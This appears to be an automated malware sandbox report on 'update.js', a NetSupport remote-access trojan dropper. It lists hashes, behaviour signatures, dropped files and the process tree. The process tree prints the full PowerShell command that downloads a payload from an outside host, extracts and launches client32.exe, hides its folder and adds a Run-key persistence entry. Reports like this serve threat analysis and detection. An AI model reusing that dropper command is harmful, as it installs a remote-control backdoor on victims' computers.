Overview

overview

10

Static

static

1

update.js

windows7-x64

10

update.js

windows10-2004-x64

10

Analysis

  • max time kernel
    91s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/01/2024, 13:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    update.js

  • Size

    93KB

  • MD5

    45e82c537987a2e09e296c7587ae6ca8

  • SHA1

    2f5c6ef11b5c6afca0939b3390c692b82ac1653f

  • SHA256

    2218ec62fc556c7b06749ad5066a504264ef7d8349aac4d0c08443d380545ca3

  • SHA512

    d96e70b3ab173b43718117c76d5c87c8eab3b2321fb2a5cf88a50bd45d7225021e81da472c7c8df71851230eebde6193661125493f3c949075835a3c29e8ae95

  • SSDEEP

    1536:dfKBCFcJag2MfKBCFcJag2MfKBCFcJag2YfKBCFcJag2mfKfKBCFcJag2x:dfK42Yg9fK42Yg9fK42YgTfK42YgifKk

Score
10/10
netsupportpersistencerat

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://boxtechcompany.com/1/GetData.php?6391
exe.dropper

https://boxtechcompany.com/1/GetData.php?6391

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\update.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $OsDVkrlGkES='https://boxtechcompany.com/1/GetData.php?6391';$xcVxNiULYzKMaIlYLqVorQ=(New-Object System.Net.WebClient).DownloadString($OsDVkrlGkES);$DpfCYRLuVHPScYcaHlibKbjfuuMhUMZVuQQ=[System.Convert]::FromBase64String($xcVxNiULYzKMaIlYLqVorQ);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $IyrierWsCFMAdjhPJnDxD=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $IyrierWsCFMAdjhPJnDxD -PathType Container)) { New-Item -Path $IyrierWsCFMAdjhPJnDxD -ItemType Directory };$p=Join-Path $IyrierWsCFMAdjhPJnDxD 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$DpfCYRLuVHPScYcaHlibKbjfuuMhUMZVuQQ);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$IyrierWsCFMAdjhPJnDxD)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $IyrierWsCFMAdjhPJnDxD 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $IyrierWsCFMAdjhPJnDxD -Force; $FSDFSSD.attributes='Hidden';$s=$IyrierWsCFMAdjhPJnDxD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3652
      • C:\Users\Admin\AppData\Roaming\DIVX-513\client32.exe
        "C:\Users\Admin\AppData\Roaming\DIVX-513\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1852

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ny1wykir.u0t.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\HTCTL32.DLL
    Filesize

    320KB

    MD5

    c94005d2dcd2a54e40510344e0bb9435

    SHA1

    55b4a1620c5d0113811242c20bd9870a1e31d542

    SHA256

    3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

    SHA512

    2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\MSVCR100.dll
    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\NSM.LIC
    Filesize

    258B

    MD5

    1b41e64c60ca9dfadeb063cd822ab089

    SHA1

    abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

    SHA256

    f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

    SHA512

    c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\PCICHEK.DLL
    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\PCICL32.DLL
    Filesize

    2.3MB

    MD5

    9383df389ac361ede90d40063d9b9977

    SHA1

    ef48112a94b6dbf8cd60c43a79c16e99451af667

    SHA256

    515be25bede9da8a397c51d709acabadd7f0af0ef0082bd2ea4838259607ae51

    SHA512

    2583aa9bc18728375a18a1fe9978d554a5b71ef18041b3404633c538d478e0979e8e5b06d6378beafb2b04d698f5e0922f8898fbfe59d32dda9bc8155b67de83

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\PCICL32.dll
    Filesize

    45KB

    MD5

    ce3584ba1927c71c2f1c722a1e105578

    SHA1

    8c164e885fbbd177e396bee470f6f04603619cea

    SHA256

    56de7db06d746665c9a0ae6cfcae413e6135b7fa8e6ca15faa32d65390d2a41f

    SHA512

    3dde87c4fd28d2ed8b1d0733353d45487070a61ae988d13f65ae83808ce4560f4a35bd66e9fbf31efc47d433be974844246e819c29263d98ef22dc0e7b72cdca

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\client32.exe
    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\client32.exe
    Filesize

    88KB

    MD5

    e57f8a9415b10966d9a5264eb02a9172

    SHA1

    b40cb0178622fc97c51f92bd3b7b032d5eb99a64

    SHA256

    4b3d50e4b3f145d6bb0b6b01a6783e40842e496ab39e0ea045c9cbc47d279b04

    SHA512

    a7e8b8f54ffa6fadad738df301e0673751464d53ce3e3cefbd5125d105a94d3d0bb104a4dca6baaaace08d1e1763025622e3c950ecd434f9538c5f79c7eacc6c

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\client32.exe
    Filesize

    32KB

    MD5

    f8d503767e3cb9706b56d3601ebf9c4c

    SHA1

    ebcbee81eb20f119a2f68c7af7aebc8915553019

    SHA256

    1eae2c96a081d0426de78920987701e08f51311936bdfcd55e5a2fda338abff5

    SHA512

    ec2a29f7256bdecc10ec61df8a8c5864e4d540dc4d5bbf783fb9f1333729cf82fb64237dcbac32f9da2b0609abe064111be872b6ac75b5cabadf7d99b004b315

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\client32.ini
    Filesize

    701B

    MD5

    5d5a682d300dd44ec669829d77790b31

    SHA1

    9a124709f1a17f18b61179bfed6797df13e387a2

    SHA256

    22f3be353ce99ddc16179f0280936fd2626b949efc3dacf0d23c085a98503ec8

    SHA512

    beff890c9e59d2033a15eda015db137da44ca77a7361f8b1a1ea76a6138806c898f9eac8a7a794ca0dc32e1f3c5e5bd8058a52164652d015df02305786f407e7

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\pcicapi.dll
    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX-513\pcicapi.dll
    Filesize

    2KB

    MD5

    ea28763a8980e67f9d809a60a6df582a

    SHA1

    809a5f337857b4c5675e3125a83d24fb814296d8

    SHA256

    e0fb6be8a0b93259fb2d5311424cffc946c06f91f5de41341fc71bc8d6250a3f

    SHA512

    113d6b2a8c0eb945670ce280a840909736e2cf8faf8c83e609fbe902b0f6392b6c3a666264a66d4fddb785230831ab1f3008ccf94bb48a7032657ea56e731673

    Download Submit

  • memory/3652-0-0x000001AC884C0000-0x000001AC884E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3652-15-0x000001AC88560000-0x000001AC88572000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3652-82-0x00007FFECC390000-0x00007FFECCE51000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3652-14-0x000001AC88530000-0x000001AC8853A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3652-12-0x000001ACA0720000-0x000001ACA0730000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3652-11-0x000001ACA0720000-0x000001ACA0730000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3652-1-0x00007FFECC390000-0x00007FFECCE51000-memory.dmp

    Filesize

    10.8MB

    Download